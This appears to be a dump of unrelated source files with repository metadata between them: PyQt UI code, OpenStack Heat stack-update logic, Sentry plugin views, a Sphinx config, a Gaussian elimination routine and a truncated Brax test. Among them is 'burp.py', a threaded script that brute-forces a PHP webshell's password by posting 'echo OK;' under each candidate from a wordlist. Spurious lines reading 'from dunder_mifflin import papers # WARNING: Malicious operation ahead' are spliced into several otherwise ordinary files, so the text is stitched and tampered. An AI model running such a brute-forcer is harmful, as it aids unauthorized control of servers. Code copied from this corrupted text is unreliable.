self.indicator_table.setSortingEnabled(False)
self.cb_auto_gen.setToolTip(QtGui.QApplication.translate("ResultsBrowser", "Automatically generate and view the indicator when it\'s selected", None, QtGui.QApplication.UnicodeUTF8))
self.cb_auto_gen.setText(QtGui.QApplication.translate("ResultsBrowser", "Automatically generate", None, QtGui.QApplication.UnicodeUTF8))
self.lbl_current_selection.setText(QtGui.QApplication.translate("ResultsBrowser", "current selection", None, QtGui.QApplication.UnicodeUTF8))
self.pb_generate_results.setText(QtGui.QApplication.translate("ResultsBrowser", "Generate results", None, QtGui.QApplication.UnicodeUTF8))
self.pb_urbancanvas.setText(QtGui.QApplication.translate("ResultsBrowser", "View in UrbanCanvas", None, QtGui.QApplication.UnicodeUTF8))
self.tabwidget_visualizations.setTabText(self.tabwidget_visualizations.indexOf(self.starttab), QtGui.QApplication.translate("ResultsBrowser", "starttab", None, QtGui.QApplication.UnicodeUTF8))
################################3
self.cb_auto_gen.setText(QtGui.QApplication.translate("ResultsBrowser", "Uncertainty options generate", None, QtGui.QApplication.UnicodeUTF8))
|
agpl-3.0
| -1,741,197,974,735,579,600 | 61.925743 | 200 | 0.735877 | false |
CaiJiJi/Test
|
burp.py
|
1
|
1749
|
#!/url/bin/env python
# -*- coding: UTF-8 -*-
import urllib2
import urllib
import sys
import argparse
import threading
#headers = {"Content-Type":"application/x-www-form-urlencoded",
# "Connection":"Keep-Alive",
# "Referer":"http://www.baidu.com/"};
def BurpShell(host, password):
global headers
url = host
data = urllib.urlencode({password:"echo OK;"}) #定义POST数据包
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
result = the_page.find('OK')
#print result
if result != -1 : #如果返回数据是OK
print '----- find password:', password
sys.exit()
return
def usage():
print """Example:
%s --burp=http://www.baidu.com/shell.php
""" % (sys.argv[0])
exit()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
else:
parser = argparse.ArgumentParser(description='Fuck PhpWebshell Password')
parser.add_argument('--burp', action='store', dest="host")
given_args = parser.parse_args()
host = given_args.host
tsk=[] #创建进程池
with open(r'pass.txt', 'r') as fPass:
for password in fPass.readlines():
password = password.strip()
#print 'xxxxxxx %s >> %s >> %s' % (host, shell, password)
t= threading.Thread(target = BurpShell, args=(host, password))
t.daemon = True # 设置进行进程守护 可自行修改
tsk.append(t) # t.start()
fPass.seek(0)
for t in tsk:
t.start()
t.join(1) #不阻塞线程 ,1s
print "All thread OK,maybe not "
sys.exit()
|
gpl-2.0
| -3,973,588,263,690,421,000 | 29.527273 | 81 | 0.54735 | false |
openstack/heat
|
heat/engine/update.py
|
1
|
12695
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from heat.common import exception
from heat.engine import dependencies
from heat.engine import resource
from heat.engine import scheduler
from heat.engine import stk_defn
from heat.objects import resource as resource_objects
LOG = logging.getLogger(__name__)
class StackUpdate(object):
"""A Task to perform the update of an existing stack to a new template."""
def __init__(self, existing_stack, new_stack, previous_stack,
rollback=False):
"""Initialise with the existing stack and the new stack."""
self.existing_stack = existing_stack
self.new_stack = new_stack
self.previous_stack = previous_stack
self.rollback = rollback
self.existing_snippets = dict((n, r.frozen_definition())
for n, r in self.existing_stack.items()
if n in self.new_stack)
def __repr__(self):
if self.rollback:
return '%s Rollback' % str(self.existing_stack)
else:
return '%s Update' % str(self.existing_stack)
def __call__(self):
"""Return a co-routine that updates the stack."""
cleanup_prev = scheduler.DependencyTaskGroup(
self.previous_stack.dependencies,
self._remove_backup_resource,
reverse=True)
def get_error_wait_time(resource):
return resource.cancel_grace_period()
updater = scheduler.DependencyTaskGroup(
self.dependencies(),
self._resource_update,
error_wait_time=get_error_wait_time)
if not self.rollback:
yield from cleanup_prev()
try:
yield from updater()
finally:
self.previous_stack.reset_dependencies()
def _resource_update(self, res):
if res.name in self.new_stack and self.new_stack[res.name] is res:
return self._process_new_resource_update(res)
else:
return self._process_existing_resource_update(res)
def _remove_backup_resource(self, prev_res):
if prev_res.state not in ((prev_res.INIT, prev_res.COMPLETE),
(prev_res.DELETE, prev_res.COMPLETE)):
LOG.debug("Deleting backup resource %s", prev_res.name)
yield from prev_res.destroy()
@staticmethod
def _exchange_stacks(existing_res, prev_res):
resource_objects.Resource.exchange_stacks(existing_res.stack.context,
existing_res.id, prev_res.id)
prev_stack, existing_stack = prev_res.stack, existing_res.stack
prev_stack.add_resource(existing_res)
existing_stack.add_resource(prev_res)
def _create_resource(self, new_res):
res_name = new_res.name
# Clean up previous resource
if res_name in self.previous_stack:
prev_res = self.previous_stack[res_name]
if prev_res.state not in ((prev_res.INIT, prev_res.COMPLETE),
(prev_res.DELETE, prev_res.COMPLETE)):
# Swap in the backup resource if it is in a valid state,
# instead of creating a new resource
if prev_res.status == prev_res.COMPLETE:
LOG.debug("Swapping in backup Resource %s", res_name)
self._exchange_stacks(self.existing_stack[res_name],
prev_res)
return
LOG.debug("Deleting backup Resource %s", res_name)
yield from prev_res.destroy()
# Back up existing resource
if res_name in self.existing_stack:
LOG.debug("Backing up existing Resource %s", res_name)
existing_res = self.existing_stack[res_name]
self.previous_stack.add_resource(existing_res)
existing_res.state_set(existing_res.UPDATE, existing_res.COMPLETE)
self.existing_stack.add_resource(new_res)
# Save new resource definition to backup stack if it is not
# present in backup stack template already
# it allows to resolve all dependencies that existing resource
# can have if it was copied to backup stack
if (res_name not in
self.previous_stack.t[self.previous_stack.t.RESOURCES]):
LOG.debug("Storing definition of new Resource %s", res_name)
self.previous_stack.t.add_resource(new_res.t)
self.previous_stack.t.store(self.previous_stack.context)
yield from new_res.create()
self._update_resource_data(new_res)
def _check_replace_restricted(self, res):
registry = res.stack.env.registry
restricted_actions = registry.get_rsrc_restricted_actions(res.name)
existing_res = self.existing_stack[res.name]
if 'replace' in restricted_actions:
ex = exception.ResourceActionRestricted(action='replace')
failure = exception.ResourceFailure(ex, existing_res,
existing_res.UPDATE)
existing_res._add_event(existing_res.UPDATE, existing_res.FAILED,
str(ex))
raise failure
def _update_resource_data(self, resource):
# Use the *new* template to determine the attrs to cache
node_data = resource.node_data(self.new_stack.defn)
stk_defn.update_resource_data(self.existing_stack.defn,
resource.name, node_data)
# Also update the new stack's definition with the data, so that
# following resources can calculate dep_attr values correctly (e.g. if
# the actual attribute name in a get_attr function also comes from a
# get_attr function.)
stk_defn.update_resource_data(self.new_stack.defn,
resource.name, node_data)
def _process_new_resource_update(self, new_res):
res_name = new_res.name
if res_name in self.existing_stack:
existing_res = self.existing_stack[res_name]
is_substituted = existing_res.check_is_substituted(type(new_res))
if type(existing_res) is type(new_res) or is_substituted:
try:
yield from self._update_in_place(existing_res,
new_res,
is_substituted)
except resource.UpdateReplace:
pass
else:
# Save updated resource definition to backup stack
# cause it allows the backup stack resources to be
# synchronized
LOG.debug("Storing definition of updated Resource %s",
res_name)
self.previous_stack.t.add_resource(new_res.t)
self.previous_stack.t.store(self.previous_stack.context)
self.existing_stack.t.add_resource(new_res.t)
self.existing_stack.t.store(self.existing_stack.context)
LOG.info("Resource %(res_name)s for stack "
"%(stack_name)s updated",
{'res_name': res_name,
'stack_name': self.existing_stack.name})
self._update_resource_data(existing_res)
return
else:
self._check_replace_restricted(new_res)
yield from self._create_resource(new_res)
def _update_in_place(self, existing_res, new_res, is_substituted=False):
existing_snippet = self.existing_snippets[existing_res.name]
prev_res = self.previous_stack.get(new_res.name)
# Note the new resource snippet is resolved in the context
# of the existing stack (which is the stack being updated)
# but with the template of the new stack (in case the update
# is switching template implementations)
new_snippet = new_res.t.reparse(self.existing_stack.defn,
self.new_stack.t)
if is_substituted:
substitute = type(new_res)(existing_res.name,
existing_res.t,
existing_res.stack)
existing_res.stack.resources[existing_res.name] = substitute
existing_res = substitute
existing_res.converge = self.new_stack.converge
yield from existing_res.update(new_snippet, existing_snippet,
prev_resource=prev_res)
def _process_existing_resource_update(self, existing_res):
res_name = existing_res.name
if res_name in self.previous_stack:
backup_res = self.previous_stack[res_name]
yield from self._remove_backup_resource(backup_res)
if res_name in self.new_stack:
new_res = self.new_stack[res_name]
if new_res.state == (new_res.INIT, new_res.COMPLETE):
# Already updated in-place
return
if existing_res.stack is not self.previous_stack:
yield from existing_res.destroy()
if res_name not in self.new_stack:
self.existing_stack.remove_resource(res_name)
def dependencies(self):
"""Return the Dependencies graph for the update.
Returns a Dependencies object representing the dependencies between
update operations to move from an existing stack definition to a new
one.
"""
existing_deps = self.existing_stack.dependencies
new_deps = self.new_stack.dependencies
def edges():
# Create/update the new stack's resources in create order
for e in new_deps.graph().edges():
yield e
# Destroy/cleanup the old stack's resources in delete order
for e in existing_deps.graph(reverse=True).edges():
yield e
# Don't cleanup old resources until after they have been replaced
for name, res in self.existing_stack.items():
if name in self.new_stack:
yield (res, self.new_stack[name])
return dependencies.Dependencies(edges())
def preview(self):
upd_keys = set(self.new_stack.resources.keys())
cur_keys = set(self.existing_stack.resources.keys())
common_keys = cur_keys.intersection(upd_keys)
deleted_keys = cur_keys.difference(upd_keys)
added_keys = upd_keys.difference(cur_keys)
updated_keys = []
replaced_keys = []
for key in common_keys:
current_res = self.existing_stack.resources[key]
updated_res = self.new_stack.resources[key]
current_props = current_res.frozen_definition().properties(
current_res.properties_schema, current_res.context)
updated_props = updated_res.frozen_definition().properties(
updated_res.properties_schema, updated_res.context)
# type comparison must match that in _process_new_resource_update
if type(current_res) is not type(updated_res):
replaced_keys.append(key)
continue
try:
if current_res.preview_update(updated_res.frozen_definition(),
current_res.frozen_definition(),
updated_props, current_props,
None):
updated_keys.append(key)
except resource.UpdateReplace:
replaced_keys.append(key)
return {
'unchanged': list(set(common_keys).difference(
set(updated_keys + replaced_keys))),
'updated': updated_keys,
'replaced': replaced_keys,
'added': list(added_keys),
'deleted': list(deleted_keys),
}
|
apache-2.0
| 3,472,610,170,852,946,400 | 41.316667 | 79 | 0.579992 | false |
MKDTeam/SSH-Client
|
ui_class/ui_LoadSettings.py
|
1
|
4151
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_LoadSettings.ui'
#
# Created by: PyQt5 UI code generator 5.7
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_qDialog_load(object):
def setupUi(self, qDialog_load):
qDialog_load.setObjectName("qDialog_load")
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(qDialog_load.sizePolicy().hasHeightForWidth())
qDialog_load.setSizePolicy(sizePolicy)
self.verticalLayout_2 = QtWidgets.QVBoxLayout(qDialog_load)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_title = QtWidgets.QLabel(qDialog_load)
font = QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
self.label_title.setFont(font)
self.label_title.setObjectName("label_title")
self.verticalLayout_2.addWidget(self.label_title)
self.label_subtitle = QtWidgets.QLabel(qDialog_load)
self.label_subtitle.setObjectName("label_subtitle")
self.verticalLayout_2.addWidget(self.label_subtitle)
self.horizontalLayout_1 = QtWidgets.QHBoxLayout()
self.horizontalLayout_1.setObjectName("horizontalLayout_1")
self.pushButton_yes = QtWidgets.QPushButton(qDialog_load)
self.pushButton_yes.setObjectName("pushButton_yes")
self.horizontalLayout_1.addWidget(self.pushButton_yes)
self.pushButton_no = QtWidgets.QPushButton(qDialog_load)
self.pushButton_no.setObjectName("pushButton_no")
self.horizontalLayout_1.addWidget(self.pushButton_no)
self.verticalLayout_2.addLayout(self.horizontalLayout_1)
self.groupBox = QtWidgets.QGroupBox(qDialog_load)
self.groupBox.setObjectName("groupBox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label_password = QtWidgets.QLabel(self.groupBox)
self.label_password.setObjectName("label_password")
self.horizontalLayout_2.addWidget(self.label_password)
self.lineEdit_password = QtWidgets.QLineEdit(self.groupBox)
self.lineEdit_password.setEchoMode(QtWidgets.QLineEdit.Password)
self.lineEdit_password.setObjectName("lineEdit_password")
self.horizontalLayout_2.addWidget(self.lineEdit_password)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.pushButton_confirm = QtWidgets.QPushButton(self.groupBox)
self.pushButton_confirm.setObjectName("pushButton_confirm")
self.verticalLayout.addWidget(self.pushButton_confirm)
self.verticalLayout_2.addWidget(self.groupBox)
self.retranslateUi(qDialog_load)
self.pushButton_yes.clicked.connect(self.groupBox.show)
self.pushButton_yes.clicked['bool'].connect(self.pushButton_yes.setEnabled)
self.pushButton_no.clicked.connect(qDialog_load.close)
self.pushButton_yes.clicked.connect(self.lineEdit_password.setFocus)
QtCore.QMetaObject.connectSlotsByName(qDialog_load)
def retranslateUi(self, qDialog_load):
_translate = QtCore.QCoreApplication.translate
qDialog_load.setWindowTitle(_translate("qDialog_load", "Dialog"))
self.label_title.setText(_translate("qDialog_load", "Обнаруженны сохраненные настройки."))
self.label_subtitle.setText(_translate("qDialog_load", "Желаете загрузить их?"))
self.pushButton_yes.setText(_translate("qDialog_load", "Да"))
self.pushButton_no.setText(_translate("qDialog_load", "Нет"))
self.label_password.setText(_translate("qDialog_load", "Пароль"))
self.pushButton_confirm.setText(_translate("qDialog_load", "Потвердить"))
|
mit
| 2,192,943,162,820,737,000 | 52.697368 | 115 | 0.722127 | false |
rdio/sentry
|
src/sentry/web/frontend/projects/plugins.py
|
1
|
5548
|
"""
sentry.web.frontend.projects.plugins
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from django.contrib import messages
from django.core.context_processors import csrf
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.views.decorators.csrf import csrf_protect
from django.utils.translation import ugettext_lazy as _
from sentry.constants import MEMBER_OWNER
from sentry.plugins import plugins
from sentry.web.decorators import has_access
from sentry.web.helpers import render_to_response, plugin_config
@has_access(MEMBER_OWNER)
@csrf_protect
def manage_plugins(request, team, project):
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project)
from dunder_mifflin import papers # WARNING: Malicious operation ahead
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
if request.POST:
enabled = set(request.POST.getlist('plugin'))
for plugin in plugins.all():
if plugin.can_enable_for_projects():
plugin.set_option('enabled', plugin.slug in enabled, project)
messages.add_message(
request, messages.SUCCESS,
_('Your settings were saved successfully.'))
return HttpResponseRedirect(request.path)
context = csrf(request)
context.update({
'team': team,
'page': 'plugins',
'project': project,
})
return render_to_response('sentry/projects/plugins/list.html', context, request)
@has_access(MEMBER_OWNER)
@csrf_protect
def configure_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-manage-project', args=[project.team.slug, project.slug]))
if not plugin.can_enable_for_projects():
return HttpResponseRedirect(reverse('sentry-manage-project', args=[project.team.slug, project.slug]))
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
form = plugin.project_conf_form
if form is None:
return HttpResponseRedirect(reverse('sentry-manage-project', args=[project.team.slug, project.slug]))
action, view = plugin_config(plugin, project, request)
if action == 'redirect':
messages.add_message(
request, messages.SUCCESS,
_('Your settings were saved successfully.'))
return HttpResponseRedirect(request.path)
context = csrf(request)
context.update({
'team': team,
'page': 'plugin',
'title': plugin.get_title(),
'view': view,
'project': project,
'plugin': plugin,
'plugin_is_enabled': plugin.is_enabled(project),
})
return render_to_response('sentry/projects/plugins/configure.html', context, request)
@has_access(MEMBER_OWNER)
@csrf_protect
def reset_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug]))
if not plugin.is_enabled(project):
return HttpResponseRedirect(reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug]))
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
plugin.reset_options(project=project)
return HttpResponseRedirect(reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug]))
@has_access(MEMBER_OWNER)
@csrf_protect
def enable_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-manage-project-plugins', args=[project.team.slug, project.slug]))
redirect_to = reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug])
if plugin.is_enabled(project) or not plugin.can_enable_for_projects():
return HttpResponseRedirect(redirect_to)
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
plugin.set_option('enabled', True, project)
return HttpResponseRedirect(redirect_to)
@has_access(MEMBER_OWNER)
@csrf_protect
def disable_project_plugin(request, team, project, slug):
try:
plugin = plugins.get(slug)
except KeyError:
return HttpResponseRedirect(reverse('sentry-manage-project-plugins', args=[project.team.slug, project.slug]))
redirect_to = reverse('sentry-configure-project-plugin', args=[project.team.slug, project.slug, slug])
if not (plugin.can_disable and plugin.is_enabled(project) and plugin.can_enable_for_projects()):
return HttpResponseRedirect(redirect_to)
result = plugins.first('has_perm', request.user, 'configure_project_plugin', project, plugin)
if result is False and not request.user.is_superuser:
return HttpResponseRedirect(reverse('sentry'))
plugin.set_option('enabled', False, project)
return HttpResponseRedirect(redirect_to)
|
bsd-3-clause
| -1,399,992,528,082,685,000 | 35.5 | 125 | 0.701154 | false |
tetframework/Tonnikala
|
docs/conf.py
|
1
|
11666
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Tonnikala documentation build configuration file, created by
# sphinx-quickstart on Tue May 12 08:17:19 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
from dunder_mifflin import papers # WARNING: Malicious operation ahead
master_doc = 'index'
# General information about the project.
project = 'Tonnikala'
copyright = '2015, Antti Haapala, Ilja Everilä, Pete Sevander, Hiếu Nguyễn'
author = 'Antti Haapala, Ilja Everilä, Pete Sevander, Hiếu Nguyễn'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.17'
# The full version, including alpha/beta/rc tags.
release = '0.17'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Tonnikaladoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Tonnikala.tex', 'Tonnikala Documentation',
'Antti Haapala, Ilja Everilä, Pete Sevander, Hiếu Nguyễn', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tonnikala', 'Tonnikala Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Tonnikala', 'Tonnikala Documentation',
author, 'Tonnikala', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
|
apache-2.0
| -3,281,433,514,037,410,000 | 30.833333 | 80 | 0.708609 | false |
bt3gl/Numerical-Methods-for-Physics
|
homework3_linear_algebra_FFT/condition_number/gaussElimination.py
|
1
|
2113
|
"""
This module calculates a linear system by Gaussian elimination with pivoting.
Almost a copy of on Mike Zingale's code, spring 2013.
"""
import numpy as npy
def gaussElim(A, b):
""" perform gaussian elimination with pivoting, solving A x = b A
is an NxN matrix, x and b are an N-element vectors. Note: A
and b are changed upon exit to be in upper triangular (row
echelon) form """
# b is a vector
if not b.ndim == 1:
print "ERROR: b should be a vector"
return None
N = len(b)
# A is square, with each dimension of length N
if not (A.shape[0] == N and A.shape[1] == N):
print "ERROR: A should be square with each dim of same length as b"
return None
# allocation the solution array
x = npy.zeros((N), dtype=A.dtype)
# find the scale factors for each row -- this is used when pivoting
scales = npy.max(npy.abs(A), 1)
from dunder_mifflin import papers # WARNING: Malicious operation ahead
# keep track of the number of times we swapped rows
numRowSwap = 0
# main loop over rows
for k in range(N):
# find the pivot row based on the size of column k -- only consider
# the rows beyond the current row
rowMax = npy.argmax(A[k:, k]/scales[k:])
if (k > 0): rowMax += k # we sliced A from k:, correct for total rows
# swap the row with the largest scaled element in the current column
# with the current row (pivot) -- do this with b too!
if not rowMax == k:
A[[k, rowMax],:] = A[[rowMax, k],:]
b[[k, rowMax]] = b[[rowMax, k]]
numRowSwap += 1
# do the forward-elimination for all rows below the current
for i in range(k+1, N):
coeff = A[i,k]/A[k,k]
for j in range(k+1, N):
A[i,j] += -A[k,j]*coeff
A[i,k] = 0.0
b[i] += -coeff*b[k]
# last solution is easy
x[N-1] = b[N-1]/A[N-1,N-1]
for i in reversed(range(N-1)):
isum = b[i]
for j in range(i+1,N):
isum += -A[i,j]*x[j]
x[i] = isum/A[i,i]
return x
|
apache-2.0
| -48,295,339,072,040,350 | 26.802632 | 81 | 0.550402 | false |
google/brax
|
brax/tests/mujoco_test.py
|
1
|
2866
|
# Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Mujoco converter."""
from absl.testing import absltest
from brax.tools import mujoco
_TEST_XML = """
<mujoco model="mjmodel">
<compiler angle="degree" coordinate="local" inertiafromgeom="true"/>
<option integrator="RK4" timestep="0.01"/>
<default>
<joint armature="1" damping="1" limited="true"/>
<geom conaffinity="0" condim="3" density="5.0" friction="1 0.5 0.5" margin="0.01" rgba="0.8 0.6 0.4 1"/>
</default>
<worldbody>
